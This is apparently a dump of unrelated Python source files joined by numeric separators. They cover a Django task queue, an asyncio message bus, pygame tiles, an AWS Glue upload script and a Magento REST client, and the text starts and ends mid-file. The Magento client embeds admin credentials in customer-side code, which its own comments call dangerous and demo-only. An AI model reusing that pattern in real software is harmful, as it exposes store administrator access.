from .constants import TASKQ_DEFAULT_CONSUMER_SLEEP_RATE, TASKQ_DEFAULT_TASK_TIMEOUT
from .exceptions import Cancel, TaskLoadingError, TaskFatalError
from .models import Task
from .scheduler import Scheduler
from .task import Taskify
from .utils import task_from_scheduled_task, traceback_filter_taskq_frames, ordinal
logger = logging.getLogger('taskq')
class Consumer:
    """Collect and executes tasks when they are due."""

    def __init__(self, sleep_rate=TASKQ_DEFAULT_CONSUMER_SLEEP_RATE, execute_tasks_barrier=None):
        """Create a new Consumer.

        :param sleep_rate: The time in seconds the consumer will wait between
        each run loop iteration (mostly usefull when testing).
        :param execute_tasks_barrier: Install the passed barrier in the
        `execute_tasks_barrier` method to test its thread-safety. DO NOT USE
        IN PRODUCTION.
        """
        super().__init__()
        self._should_stop = threading.Event()
        self._scheduler = Scheduler()
        # Test parameters
        self._sleep_rate = sleep_rate
        self._execute_tasks_barrier = execute_tasks_barrier

    def stop(self):
        """Ask the consumer to exit its run loop at the next iteration."""
        logger.info('Consumer was asked to quit. '
                    'Terminating process in less than %ss.', self._sleep_rate)
        self._should_stop.set()

    @property
    def stopped(self):
        # True once stop() has been called.
        return self._should_stop.is_set()

    def run(self):
        """The main entry point to start the consumer run loop."""
        logger.info('Consumer started.')
        while not self.stopped:
            self.create_scheduled_tasks()
            self.execute_tasks()
            sleep(self._sleep_rate)

    def create_scheduled_tasks(self):
        """Register new tasks for each scheduled (recurring) tasks defined in
        the project settings.
        """
        due_tasks = self._scheduler.due_tasks
        if not due_tasks:
            return
        # Multiple instances of taskq rely on an advisory lock.
        # This lock is self-exclusive so that only one session can hold it at a time.
        # https://www.postgresql.org/docs/11/explicit-locking.html#ADVISORY-LOCKS
        with advisory_lock("taskq_create_scheduled_tasks"):
            for scheduled_task in due_tasks:
                # Skip occurrences another consumer already materialized.
                task_exists = Task.objects.filter(
                    name=scheduled_task.name,
                    due_at=scheduled_task.due_at
                ).exists()
                if task_exists:
                    continue
                task = task_from_scheduled_task(scheduled_task)
                task.save()
            self._scheduler.update_all_tasks_due_dates()

    @transaction.atomic
    def execute_tasks(self):
        # Fetch and process due tasks inside one transaction so the row
        # locks taken by fetch_due_tasks() are held until processing ends.
        due_tasks = self.fetch_due_tasks()
        # Only used when testing. Ask the consumers to wait for each others at
        # the barrier.
        if self._execute_tasks_barrier is not None:
            self._execute_tasks_barrier.wait()
        self.process_tasks(due_tasks)

    def fetch_due_tasks(self):
        # Multiple instances of taskq rely on select_for_update().
        # This mechanism will lock selected rows until the end of the transaction.
        # We also fetch STATUS_RUNNING in case of previous inconsistent state.
        due_tasks = Task.objects.filter(
            Q(status=Task.STATUS_QUEUED) | Q(status=Task.STATUS_RUNNING),
            due_at__lte=timezone.now()
        ).select_for_update(skip_locked=True)
        return due_tasks

    def process_tasks(self, due_tasks):
        # Run each due task sequentially, in this process.
        for due_task in due_tasks:
            self.process_task(due_task)

    def process_task(self, task):
        """Load and execute the task"""
        # Per-task timeout wins over the project-level setting.
        if task.timeout is None:
            timeout = getattr(settings, 'TASKQ_TASK_TIMEOUT', TASKQ_DEFAULT_TASK_TIMEOUT)
        else:
            timeout = task.timeout
        if not task.retries:
            logger.info('%s : Started', task)
        else:
            nth = ordinal(task.retries)
            logger.info('%s : Started (%s retry)', task, nth)
        task.status = Task.STATUS_RUNNING
        task.save()

        def _execute_task():
            function, args, kwargs = self.load_task(task)
            self.execute_task(function, args, kwargs)
        try:
            if timeout.total_seconds():
                # Signal-based timeouts only work in the main thread,
                # hence the assertion before applying the decorator.
                assert threading.current_thread() is threading.main_thread()
                timeout_decorator.timeout(seconds=timeout.total_seconds(), use_signals=True)(_execute_task)()
            else:
                # A zero timeout means "no limit": run the task directly.
                _execute_task()
        except TaskFatalError as e:
            logger.info('%s : Fatal error', task)
            self.fail_task(task, e)
        except Cancel:
            logger.info('%s : Canceled', task)
            task.status = Task.STATUS_CANCELED
        except timeout_decorator.TimeoutError as e:
            logger.info('%s : Timed out', task)
            self.fail_task(task, e)
        except Exception as e:
            if task.retries < task.max_retries:
                logger.info('%s : Failed, will retry', task)
                self.retry_task_later(task)
            else:
                logger.info('%s : Failed, exceeded max retries', task)
                self.fail_task(task, e)
        else:
            logger.info('%s : Success', task)
            task.status = Task.STATUS_SUCCESS
        finally:
            # Persist whatever status the branches above decided on.
            task.save()

    def retry_task_later(self, task):
        # Re-queue the task with a pushed-back due date; the caller's
        # finally block performs the save.
        task.status = Task.STATUS_QUEUED
        task.retries += 1
        task.update_due_at_after_failure()

    def fail_task(self, task, error):
        # Mark the task failed and log the taskq-frame-filtered traceback.
        task.status = Task.STATUS_FAILED
        exc_traceback = traceback_filter_taskq_frames(error)
        type_name = type(error).__name__
        exc_info = (type(error), error, exc_traceback)
        logger.exception('%s : %s %s', task, type_name, error, exc_info=exc_info)

    def load_task(self, task):
        # Resolve the task's function and decode its stored arguments.
        function = self.import_taskified_function(task.function_name)
        args, kwargs = task.decode_function_args()
        return (function, args, kwargs)

    def import_taskified_function(self, import_path):
        """Load a @taskified function from a python module.

        Returns TaskLoadingError if loading of the function failed.
        """
        # https://stackoverflow.com/questions/3606202
        module_name, unit_name = import_path.rsplit('.', 1)
        try:
            module = importlib.import_module(module_name)
        except (ImportError, SyntaxError) as e:
            raise TaskLoadingError(e)
        try:
            obj = getattr(module, unit_name)
        except AttributeError as e:
            raise TaskLoadingError(e)
        if not isinstance(obj, Taskify):
            msg = f'Object "{import_path}" is not a task'
            raise TaskLoadingError(msg)
        return obj

    def execute_task(self, function, args, kwargs):
        """Execute the code of the task"""
        # Each task body runs in its own (nested) transaction.
        with transaction.atomic():
            function._protected_call(args, kwargs)
| 7,220 | 2,080 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright 2020-2021 by Murray Altheim. All rights reserved. This file is part
# of the Robot Operating System project, released under the MIT License. Please
# see the LICENSE file included as part of this package.
#
# author: Murray Altheim
# created: 2021-02-24
# modified: 2021-02-24
#
# see: https://www.aeracode.org/2018/02/19/python-async-simplified/
import sys, time, asyncio, itertools, traceback
from abc import ABC, abstractmethod
from collections import deque as Deque
import uuid
import random
from colorama import init, Fore, Style
init()
from lib.event import Event
from lib.ticker import Ticker
from lib.message import Message
from lib.message_factory import MessageFactory
from lib.logger import Logger, Level
#from mock.ifs import MockIntegratedFrontSensor
# ..............................................................................
class MessageBus():
    '''
    A minimal publish/subscribe message bus: subscribers register a queue,
    publish() delivers each message to every registered queue.
    '''
    def __init__(self, level=Level.INFO):
        self._log = Logger('bus', level)
        self._log.debug('initialised...')
        self._subscriptions = set()
        self._log.debug('ready.')

    # ..........................................................................
    @property
    def subscriptions(self):
        '''
        Return the current set of Subscriptions.
        '''
        return self._subscriptions

    # ..........................................................................
    def publish(self, message: Message):
        '''
        Publishes the Message to all Subscribers.
        '''
        self._log.info(Style.BRIGHT + 'publish message: {}'.format(message))
        for subscriber_queue in self._subscriptions:
            subscriber_queue.put_nowait(message)
# ..............................................................................
class Subscription():
    '''
    A subscription on the MessageBus.

    Used as a context manager: entering registers a fresh asyncio.Queue
    with the bus and returns it; exiting unregisters it.
    '''
    def __init__(self, message_bus, level=Level.WARN):
        self._log = Logger('subscription', level)
        self._log.debug('__init__')
        self._message_bus = message_bus
        # the queue messages are delivered to while the subscription is active
        self.queue = asyncio.Queue()

    def __enter__(self):
        self._log.debug('__enter__')
        self._message_bus._subscriptions.add(self.queue)
        return self.queue

    def __exit__(self, type, value, traceback):
        self._log.debug('__exit__')
        self._message_bus._subscriptions.remove(self.queue)
# ..............................................................................
class Subscriber(ABC):
    '''
    Abstract subscriber functionality, to be subclassed by any classes
    that subscribe to a MessageBus.
    '''
    def __init__(self, name, message_bus, level=Level.WARN):
        self._log = Logger('subscriber-{}'.format(name), level)
        self._name = name
        self._log.debug('Subscriber created.')
        self._message_bus = message_bus
        self._log.debug('ready.')

    # ..............................................................................
    @property
    def name(self):
        # The name this subscriber was created with.
        return self._name

    # ..............................................................................
    def filter(self, message):
        '''
        Abstract filter: if not overridden, the default is simply to pass the message.
        '''
        self._log.info(Fore.RED + 'FILTER Subscriber.filter(): {} rxd msg #{}: priority: {}; desc: "{}"; value: '.format(\
                self._name, message.number, message.priority, message.description) + Fore.WHITE + Style.NORMAL + '{}'.format(message.value))
        return message

    # ..............................................................................
    @abstractmethod
    async def handle_message(self, message):
        '''
        Abstract function that receives a message obtained from a Subscription
        to the MessageBus, performing an actions based on receipt.
        This is to be subclassed to provide message handling/processing functionality.

        Returns the message when it passes filter(), otherwise None.
        '''
        _event = message.event
        _message = self.filter(message)
        if _message:
            self._log.info(Fore.GREEN + 'FILTER-PASS: Subscriber.handle_message(): {} rxd msg #{}: priority: {}; desc: "{}"; value: '.format(\
                    self._name, message.number, message.priority, message.description) + Fore.WHITE + Style.NORMAL + '{} .'.format(_message.value))
        else:
            self._log.info(Fore.GREEN + Style.DIM + 'FILTERED-OUT: Subscriber.handle_message() event: {}'.format(_event.name))
        return _message

    # ..............................................................................
    @abstractmethod
    async def subscribe(self):
        '''
        Subscribe to the MessageBus (after a random startup delay) and
        consume messages until a SHUTDOWN event arrives or this subscriber
        randomly decides (p = 0.1 per message) it has received enough.
        '''
        self._log.debug('subscribe called.')
        await asyncio.sleep(random.random() * 8)
        self._log.info(Fore.GREEN + 'Subscriber {} has subscribed.'.format(self._name))
        _message_count = 0
        _message = Message(-1, Event.NO_ACTION, None) # initial non-null message
        with Subscription(self._message_bus) as queue:
            while _message.event != Event.SHUTDOWN:
                _message = await queue.get()
                # NOTE(review): handle_message() is declared async but is
                # called here without await; this works only because the
                # concrete override in MySubscriber is synchronous --
                # confirm before adding an await.
                self.handle_message(_message)
                _message_count += 1
                self._log.info(Fore.GREEN + 'Subscriber {} rxd msg #{}: priority: {}; desc: "{}"; value: '.format(\
                        self._name, _message.number, _message.priority, _message.description) + Fore.WHITE + Style.NORMAL + '{}'.format(_message.value))
                if random.random() < 0.1:
                    self._log.info(Fore.GREEN + 'Subscriber {} has received enough'.format(self._name))
                    break
        self._log.info(Fore.GREEN + 'Subscriber {} is shutting down after receiving {:d} messages.'.format(self._name, _message_count))
# ..............................................................................
class Publisher(ABC):
    '''
    Abstract publisher, subclassed by any classes that publish to a MessageBus.
    '''
    def __init__(self, message_factory, message_bus, level=Level.INFO):
        self._log = Logger('pub', level)
        self._log.info(Fore.MAGENTA + 'Publisher: create.')
        self._message_factory = message_factory
        self._message_bus = message_bus
        # monotonically-increasing message number
        self._counter = itertools.count()
        self._log.debug('ready.')

    # ..........................................................................
    def get_message_of_type(self, event, value):
        '''
        Build a Message of the given Event type carrying the given value,
        using the configured MessageFactory.
        '''
        return self._message_factory.get_message(event, value)

    def get_random_event_type(self):
        '''
        Return one of a fixed set of Event types, chosen at random.
        '''
        types = [ Event.STOP, Event.INFRARED_PORT, Event.INFRARED_STBD, Event.FULL_AHEAD, Event.ROAM, Event.EVENT_R1 ]
        return types[random.randint(0, len(types)-1)]

    # ..........................................................................
    @abstractmethod
    async def publish(self, iterations):
        '''
        Publish 'iterations' randomly-typed messages (one per second),
        then a final SHUTDOWN message.
        '''
        self._log.info(Fore.MAGENTA + Style.BRIGHT + 'Publish called.')
        for index in range(iterations):
            self._log.info(Fore.MAGENTA + 'Publisher: I have {} subscribers now'.format(len(self._message_bus.subscriptions)))
            _uuid = str(uuid.uuid4())
            _message = self.get_message_of_type(self.get_random_event_type(), 'msg_{:d}-{}'.format(index, _uuid))
            _message.number = next(self._counter)
            self._message_bus.publish(_message)
            await asyncio.sleep(1)
        _shutdown_message = self.get_message_of_type(Event.SHUTDOWN, 'shutdown')
        self._message_bus.publish(_shutdown_message)
# ..............................................................................
class MySubscriber(Subscriber):
    '''
    Extends Subscriber as a typical subscriber use case class.

    Received messages are pushed onto an internal bounded deque by
    handle_message() and popped/processed later by the Ticker callback.
    '''
    def __init__(self, name, ticker, message_bus, level=Level.INFO):
        super().__init__(name, message_bus, level)
        self._log.info(Fore.YELLOW + 'MySubscriber-{}: create.'.format(name))
        self._ticker = ticker
        self._ticker.add_callback(self.tick)
        # when True, uninteresting messages are popped and discarded on tick;
        # when False they are left on the queue
        self._discard_ignored = True
        _queue_limit = 10
        self._deque = Deque([], maxlen=_queue_limit)
        self._log.debug('ready.')

    # ..............................................................................
    def queue_peek(self):
        '''
        Returns a peek at the last Message of the queue or None if empty.
        '''
        return self._deque[-1] if self._deque else None

    # ..............................................................................
    def queue_length(self):
        # Number of messages currently waiting in the deque.
        return len(self._deque)

    # ..............................................................................
    def print_queue_contents(self):
        # Render each queued message as "-- msg#<number>/<eid>/<event>\n".
        str_list = []
        for _message in self._deque:
            str_list.append('-- msg#{}/{}/{}\n'.format(_message.number, _message.eid, _message.event.name))
        return ''.join(str_list)

    # ..............................................................................
    def tick(self):
        '''
        Callback from the Ticker, used to pop the queue of any messages.
        '''
        _peek = self.queue_peek()
        if _peek: # queue was not empty
            self._log.debug(Fore.WHITE + 'TICK! {:d} in queue.'.format(len(self._deque)))
            # we're only interested in types Event.INFRARED_PORT or Event.INFRARED_CNTR
            if _peek.event is Event.INFRARED_PORT or _peek.event is Event.INFRARED_STBD:
                _message = self._deque.pop()
                self._log.info(Fore.WHITE + 'MESSAGE POPPED: {} rxd msg #{}: priority: {}; desc: "{}"; value: '.format(\
                        self._name, _message.number, _message.priority, _message.description) + Fore.WHITE + Style.NORMAL + '{}'.format(_message.value))
                # deliberate long delay, to exercise (a)synchronous behaviour
                time.sleep(3.0)
                self._log.info(Fore.WHITE + Style.BRIGHT + 'MESSAGE PROCESSED: {} rxd msg #{}: priority: {}; desc: "{}"; value: '.format(\
                        self._name, _message.number, _message.priority, _message.description) + Fore.WHITE + Style.NORMAL + '{}'.format(_message.value))
            else: # we're not interested
                if self._discard_ignored:
                    _message = self._deque.pop()
                    self._log.info(Fore.YELLOW + Style.DIM + 'MESSAGE discarded: {}'.format(_message.event.name))
                else:
                    self._log.info(Fore.YELLOW + Style.DIM + 'MESSAGE ignored: {}'.format(_peek.event.name))
        else:
            self._log.debug(Style.DIM + 'TICK! {:d} in empty queue.'.format(len(self._deque)))
    # queue

    # ..............................................................................
    def filter(self, message):
        '''
        Pass only INFRARED_PORT / INFRARED_STBD messages; all others map to None.
        '''
        return message if ( message.event is Event.INFRARED_PORT or message.event is Event.INFRARED_STBD ) else None

    # ..............................................................................
    def handle_message(self, message):
        '''
        Extends the superclass' method, with a substantial delay to test
        whether the call is synchronous or asynchronous.
        '''
        # NOTE(review): unlike the (async) superclass method, this override
        # is synchronous and queues every message without calling filter().
        self._deque.appendleft(message)
        self._log.info(Fore.YELLOW + 'MySubscriber add to queue: {} rxd msg #{}: priority: {}; desc: "{}"; value: '.format(\
                self._name, message.number, message.priority, message.description) + Fore.WHITE + Style.NORMAL + '{}'.format(message.value) \
                + Style.BRIGHT + ' {} in queue.'.format(len(self._deque)))

    # ..............................................................................
    def subscribe(self):
        '''
        Subscribes to the MessageBus by passing the call to the superclass.
        '''
        self._log.debug(Fore.YELLOW + 'MySubscriber.subscribe() called.')
        return super().subscribe()
# ..............................................................................
class MyPublisher(Publisher):
    '''
    Concrete Publisher used by the demo's main(); adds logging around the
    inherited publish() coroutine.
    '''
    def __init__(self, message_factory, message_bus, level=Level.INFO):
        super().__init__(message_factory, message_bus, level)
        self._message_bus = message_bus # probably not needed
        self._log.info('ready.')

    # ..........................................................................
    def publish(self, iterations):
        '''
        Log, then delegate to the superclass implementation.
        '''
        self._log.info(Fore.MAGENTA + Style.BRIGHT + 'MyPublish called, passing... ========= ======= ======== ======= ======== ')
        return super().publish(iterations)
# main .........................................................................
#_log = Logger('main', Level.INFO)
def main(argv):
    """Demo entry point: wire a publisher and ten subscribers onto a shared
    MessageBus and run them to completion on an asyncio event loop.

    BUG FIX: the per-subscriber summary loop read the stale variable
    '_subscriber' (left over from the construction loop above, i.e. always
    the last subscriber created) instead of the loop variable 'subscriber'.
    """
    _log = Logger("main", Level.INFO)
    try:
        _log.info(Fore.BLUE + 'configuring objects...')
        _loop_freq_hz = 10
        _ticker = Ticker(_loop_freq_hz, Level.INFO)
        _message_factory = MessageFactory(Level.INFO)
        _message_bus = MessageBus()
        _publisher = MyPublisher(_message_factory, _message_bus)
        _publish = _publisher.publish(10)
        _log.info(Fore.BLUE + 'generating subscribers...')
        _subscribers = []
        _subscriptions = []
        for x in range(10):
            _subscriber = MySubscriber('s{}'.format(x), _ticker, _message_bus)
            _subscribers.append(_subscriber)
            _subscriptions.append(_subscriber.subscribe())
        _ticker.enable()
        loop = asyncio.get_event_loop()
        _log.info(Fore.BLUE + 'starting loop...')
        loop.run_until_complete(asyncio.gather(_publish, *_subscriptions))
        _log.info(Fore.BLUE + 'closing {} subscribers...'.format(len(_subscribers)))
        for subscriber in _subscribers:
            _log.info(Fore.BLUE + 'subscriber {} has {:d} messages remaining in queue: {}'.format(subscriber.name, subscriber.queue_length(), subscriber.print_queue_contents()))
        _log.info(Fore.BLUE + 'loop complete.')
    except KeyboardInterrupt:
        _log.info('caught Ctrl-C; exiting...')
    except Exception:
        _log.error('error processing message bus: {}'.format(traceback.format_exc()))
    finally:
        _log.info('exit.')
# call main ....................................................................
# run the demo only when executed as a script
if __name__ == "__main__":
    main(sys.argv[1:])
#EOF
| 14,786 | 4,207 |
import pygame
import random
class Tile(pygame.sprite.Sprite):
    """A single map tile rendered as a pygame sprite, with a collision mask."""

    def __init__(self, original_image, mask_image):
        super().__init__()
        # visible surface, plus the surface the collision mask is built from
        self.image = original_image
        self.mask_image = mask_image
        self.rect = self.image.get_rect()
        self.mask = pygame.mask.from_surface(self.mask_image)

    def movex(self, speed):
        """Shift the tile horizontally by speed pixels."""
        self.rect.x += speed

    def movey(self, speed):
        """Shift the tile vertically by speed pixels."""
        self.rect.y += speed
class GenTerrain(object):
    """Generates a ground tile for every cell of an l_x by l_y grid."""

    def __init__(self, tile_size, l_x, l_y, image):
        # Tiles collected here so callers can add them to a sprite Group.
        self.tile_list = []
        for col in range(l_x):
            for row in range(l_y):
                tile = Tile(image, image)
                tile.rect.x = col * tile_size
                tile.rect.y = row * tile_size
                self.tile_list.append(tile)
        print("Tiles Added:", len(self.tile_list))
class GenTrees(object):
    """Randomly scatters tree tiles over the interior of the map with the
    given per-cell probability."""

    def __init__(self, tile_size, map_size, images, mask_images, percentage):
        self.tree_list = []
        mask_image = mask_images[0]
        for col in range(map_size - 2):
            for row in range(map_size - 3):
                # roll a 4-decimal-place probability against the density
                if random.randrange(0, 10000, 1) / 10000 < percentage:
                    tree_image = random.choice(images)
                    # pair the chosen image with its matching collision mask
                    if tree_image == images[0]:
                        mask_image = mask_images[0]
                    if tree_image == images[1]:
                        mask_image = mask_images[1]
                    tree = Tile(tree_image, mask_image)
                    tree.rect.x = (col + 1) * tile_size
                    tree.rect.y = (row + 1) * tile_size
                    self.tree_list.append(tree)
        print("Trees Added:", len(self.tree_list))
| 2,113 | 658 |
import sys
from swatcher import Swatcher
if __name__ == "__main__":
    # each command-line argument is an input file to convert
    for path in sys.argv[1:]:
        swatch = Swatcher(path)
        swatch.export_ase_file()
        swatch.export_palette_image()
| 207 | 75 |
#! /usr/bin/env python
from setuptools import setup
# Package metadata for the microMatch distribution.
VERSION = "1.0"
AUTHOR = "James Klatzow, Virginie Uhlmann"
AUTHOR_EMAIL = "uhlmann@ebi.ac.uk"

setup(
    name="microMatch",
    version=VERSION,
    description="3D shape correspondence for microscopy data",
    author=AUTHOR,
    author_email=AUTHOR_EMAIL,
    packages=["mumatch"],
    classifiers=[
        "Intended Audience :: Science/Research",
        "Intended Audience :: Developers",
        "License :: OSI Approved",
        "Programming Language :: C",
        "Programming Language :: Python",
        "Topic :: Software Development",
        "Topic :: Scientific/Engineering",
        "Operating System :: POSIX",
        "Operating System :: Unix",
        "Operating System :: MacOS",
        "Programming Language :: Python :: 3",
        "Programming Language :: Python :: 3.6",
        "Programming Language :: Python :: 3.7",
        "Programming Language :: Python :: 3.8",
        "Programming Language :: Python :: 3.9",
        "Programming Language :: Python :: Implementation :: CPython",
    ],
    url="https://github.com/uhlmanngroup/muMatch",
    python_requires=">=3.6",
)
| 1,179 | 367 |
import datetime
import time
import boto3
import sys
import os
import importlib
print('sys.argv:\n{}\n\n'.format(sys.argv))
print('os.environ:\n{}\n\n'.format(os.environ))

# Only resolve Glue job arguments when running inside the AWS Glue
# environment (the awsglue package is not available locally).
if 'GLUE_INSTALLATION' in os.environ:
    aws_glue_utils = importlib.import_module('awsglue.utils')
    args = aws_glue_utils.getResolvedOptions(sys.argv,
                                             ['example_argument_0',
                                              'example_argument_1'])
    print('example_argument_0 is {}\n\n'.format(args['example_argument_0']))
    print('example_argument_1 is {}\n\n'.format(args['example_argument_1']))

# Build a timestamped "hello" file next to this script.
ts = time.time()
timestamp_string = datetime.datetime.fromtimestamp(
    ts).strftime('%Y-%m-%d_%H.%M.%S')
s3 = boto3.client('s3')
bucket_name = 'aws-glue-playground-01'
bucket_directory = 'tmp'
print('__file__: {}'.format(__file__))
script_file_path = os.path.abspath(__file__)
print('script_file_path: {}'.format(script_file_path))
script_directory_path = os.path.dirname(script_file_path)
print('script_directory_path: {}'.format(script_directory_path))
local_file_path = os.path.abspath(
    '{}/{}-hello.txt'.format(script_directory_path, timestamp_string))
print('local_file_path: {}'.format(local_file_path))
local_file_name = os.path.basename(local_file_path)
print('local_file_name: {}'.format(local_file_name))
# BUG FIX: the original wrote through an unclosed handle
# (open(...).write(...)); use a context manager so the data is flushed and
# the handle closed before the upload reads the file.
with open(local_file_path, "w") as hello_file:
    hello_file.write('Hello, world!')
# Upload to s3://<bucket_name>/<bucket_directory>/<file>, then clean up.
key = '{}/{}'.format(bucket_directory, local_file_name)
s3.upload_file(local_file_path, bucket_name, key)
os.remove(local_file_path)
| 1,615 | 557 |
import requests
import time
# Magento REST endpoints used by MagentoClient (customer-scoped).
CLIENT_TOKEN_URI = "rest/V1/integration/customer/token"
GET_CART_URI = "rest/default/V1/carts/mine"
GET_CART_ITEM_URI = "rest/default/V1/carts/mine/items"
ADD_TO_CART_URI = "rest/default/V1/carts/mine/items"
ME_URI = "rest/default/V1/customers/me"
DELETE_ITEM_URI = "rest/default/V1/carts/mine/items/{}"
### SHOULD NOT EXISTS... FOR DEMO PURPOSE ONLY
# Admin-scoped endpoints and an order search filtered on customer_lastname,
# sorted by creation date.
ADMIN_TOKEN_URI = "rest/V1/integration/admin/token"
ORDER_URI = "rest/default/V1/orders"
ORDER_SEARCH_CRITERIA="searchCriteria[filter_groups][0][filters][0][field]=customer_lastname" \
                      "&searchCriteria[filter_groups][0][filters][0][value]={}" \
                      "&searchCriteria[filter_groups][0][filters][0][condition_type]=eq" \
                      "&searchCriteria[sortOrders][0][field]=created_at"
# Magento API call wrapper : catch 401 and try to recover it by refreshing the auth token
# Magento API call wrapper : catch 401 and try to recover it by refreshing the auth token
def __magento_client__(retry_interval=1, max_retry=1, fallback_return=None):
    """Decorator for MagentoClient methods: when a call raises a 401
    MagentoClientError, refresh the customer token, wait retry_interval
    seconds and retry (up to max_retry times; max_retry == 0 retries
    forever). When retries are exhausted, returns fallback_return (or None
    when no fallback is configured).

    BUG FIX: non-401 MagentoClientErrors were silently swallowed and the
    call retried in an infinite loop (the retry counter only advances on
    401); they are now re-raised to the caller.
    """
    def decorator(func):
        def wrapper(self, *args, **kwargs):
            retry = 0
            while max_retry == 0 or (max_retry > 0 and retry < max_retry):
                try:
                    return func(self, *args, **kwargs)
                except MagentoClientError as mce:
                    if mce.status_code == 401:
                        # refresh the auth token, pause, then retry
                        self._MagentoClient__get_client_token()
                        time.sleep(retry_interval)
                        retry += 1 if max_retry > 0 else 0
                        continue
                    raise
            if fallback_return is not None:
                return fallback_return
        return wrapper
    return decorator
class MagentoClientError(Exception):
    """Raised when a Magento API call fails; carries the HTTP status code
    (401 triggers a token refresh in the __magento_client__ decorator)."""

    def __init__(self, message, status_code):
        super(MagentoClientError, self).__init__(message)
        self.status_code = status_code
class MagentoStockIssueError(Exception):
    """Raised when adding an item to the cart fails for lack of stock;
    carries the HTTP status code and the offending item."""

    def __init__(self, message, status_code, item):
        super(MagentoStockIssueError, self).__init__(message)
        self.status_code = status_code
        self.item = item
class MagentoClient:
    """Thin client for the Magento REST API.

    Authenticates as a customer on construction and caches the bearer token
    in ``self.__current_token``. Methods decorated with ``__magento_client__``
    refresh the token and retry on HTTP 401 (see the decorator defined above).

    NOTE(review): this module uses Python 2 semantics in several places
    (``str``/``bytes`` mixing, ``len(map(...))``) — see inline notes.
    """

    def __init__(self, host, login, password, admin="", admin_password=""):
        # host: base URL of the Magento instance; login/password: customer credentials.
        self.__host = host
        self.__login = login
        self.__password = password
        ### THIS IS UGLY AND DANGEROUS... A MAGENTO CUSTOM API SHOULD EXISTS TO AVOID THIS !!! THIS IS FOR DEMO PURPOSE ONLY!!!
        self.__admin = admin
        self.__admin_password = admin_password
        ### ...........................................
        # Fetch the customer token eagerly so the instance is ready to use.
        self.__get_client_token()

    @staticmethod
    def __process_response(response, item=""):
        """Map a ``requests`` response to its JSON body or raise a typed error.

        item: SKU forwarded into MagentoStockIssueError for stock problems.
        """
        # Everything ok
        if response.status_code == 200:
            return response.json()
        # Auth error => we raise client error exception with 401 status code
        elif response.status_code == 401:
            raise MagentoClientError(message=response.json()['message'], status_code=response.status_code)
        # Add item to cart return stock issue => we raise Stock exception
        # NOTE(review): ``.encode('utf-8').startswith("We don't have as many")`` compares
        # bytes against str, which raises TypeError on Python 3 — this assumes Python 2.
        elif response.status_code == 400 and response.json()['message'] and response.json()['message'].encode('utf-8').startswith("We don't have as many"):
            raise MagentoStockIssueError(message=response.json()['message'], status_code=response.status_code, item=item)
        # Any other error else => we raise client error exception
        else:
            raise MagentoClientError(message="Something went wrong with Magento: {}".format(response.content), status_code=response.status_code)

    def __build_url(self, uri, query=None):
        """Join host and uri, optionally appending a pre-formatted query string."""
        if query is None:
            return "{}/{}".format(self.__host.rstrip('/'), uri)
        else:
            return "{}/{}?{}".format(self.__host.rstrip('/'), uri, query)

    def __auth_header(self):
        # Bearer header built from the cached customer token.
        return {'Authorization': 'Bearer {}'.format(self.__current_token)}

    def __custom_auth_header(self, token):
        # Bearer header for an explicitly supplied (e.g. admin) token.
        return {'Authorization': 'Bearer {}'.format(token)}

    def __get_client_token(self):
        """Request a customer API token and cache it on the instance."""
        token_response = requests.post(
            url=self.__build_url(CLIENT_TOKEN_URI),
            json={
                'username': self.__login,
                'password': self.__password
            }
        )
        # The token endpoint's JSON body is the token itself.
        self.__current_token = MagentoClient.__process_response(token_response)

    def __get_customer_lastname(self):
        """Return the authenticated customer's last name (used to search orders)."""
        return MagentoClient.__process_response(requests.get(
            url=self.__build_url(ME_URI),
            headers=self.__auth_header()
        ))['lastname']

    def __get_admin_token(self):
        """Request an admin API token (required by the orders endpoint)."""
        token_response = requests.post(
            url=self.__build_url(ADMIN_TOKEN_URI),
            json={
                'username': self.__admin,
                'password': self.__admin_password
            }
        )
        return MagentoClient.__process_response(token_response)

    @__magento_client__(max_retry=3, fallback_return=[])
    def get_cart_items(self):
        """Return (sku, qty, name) tuples for the items in the current cart."""
        items_response = MagentoClient.__process_response(requests.get(
            url=self.__build_url(GET_CART_ITEM_URI),
            headers=self.__auth_header()
        ))
        # We capture only elements we need
        return map(lambda item: (item['sku'], item['qty'], item['name'].encode('utf-8')), items_response)

    @__magento_client__(max_retry=3, fallback_return=0)
    def add_items(self, items):
        """Add ``items`` (tuples whose [1] is qty and [2] is sku) to the cart.

        Returns the number of items successfully added; raises
        MagentoStockIssueError when Magento rejects an item for stock reasons.
        """
        # First we need the cart (quote) id to be able to insert items into it.
        cart_response = requests.get(
            url=self.__build_url(GET_CART_URI),
            headers=self.__auth_header()
        )
        quote_id = MagentoClient.__process_response(cart_response)['id']
        # The item list must be transformed into the payload Magento expects.
        magento_items = map(lambda i: { 'quote_id': quote_id, 'sku': i[2], 'qty': i[1] }, items)
        # No bulk-insert endpoint was found, so we call the API once per item.
        item_added = 0
        for magento_item in magento_items:
            MagentoClient.__process_response(requests.post(
                url=self.__build_url(ADD_TO_CART_URI),
                headers=self.__auth_header(),
                json={ 'cartItem': magento_item }
            ), item=magento_item['sku'])
            item_added = item_added + 1
        return item_added

    @__magento_client__(max_retry=3, fallback_return=0)
    def purge_cart(self):
        """Delete every item in the current cart; return the number removed."""
        # First fetch the cart so we know the item ids to delete.
        cart_response = requests.get(
            url=self.__build_url(GET_CART_URI),
            headers=self.__auth_header()
        )
        cart = MagentoClient.__process_response(cart_response)
        cart_items = cart['items']

        def remove_item(item_id):
            # One DELETE call per cart item.
            return requests.delete(
                url=self.__build_url(DELETE_ITEM_URI.format(item_id)),
                headers=self.__auth_header()
            )
        # NOTE(review): ``len(results)`` requires ``map`` to return a list —
        # Python 2 behavior; on Python 3 a map object has no len().
        results = map(lambda i: MagentoClient.__process_response(remove_item(i['item_id'])), cart_items)
        return len(results)

    @__magento_client__(max_retry=3, fallback_return=[])
    def get_orders(self):
        """Return the customer's orders, searched by last name via the admin API."""
        customer_lastname = self.__get_customer_lastname()
        admin_token = self.__get_admin_token()
        query_parameters = ORDER_SEARCH_CRITERIA.format(customer_lastname)
        url = self.__build_url(ORDER_URI, query_parameters)
        headers = self.__custom_auth_header(admin_token)
        return MagentoClient.__process_response(requests.get(
            url=url,
            headers=headers
        ))['items']
| 7,570 | 2,254 |
# Package entry point: makes the code executable via ``python -m spaghettiqueue``.
# Import from the package itself rather than ``spaghettiqueue.__init__`` — the
# latter registers the same module twice in sys.modules under two names.
from spaghettiqueue import main

if __name__ == "__main__":
    main()
import math
# A function to print all prime factors of
# a given number n
def prime_factor(n):
    """Print the prime factorization of ``n`` by trial division, one factor
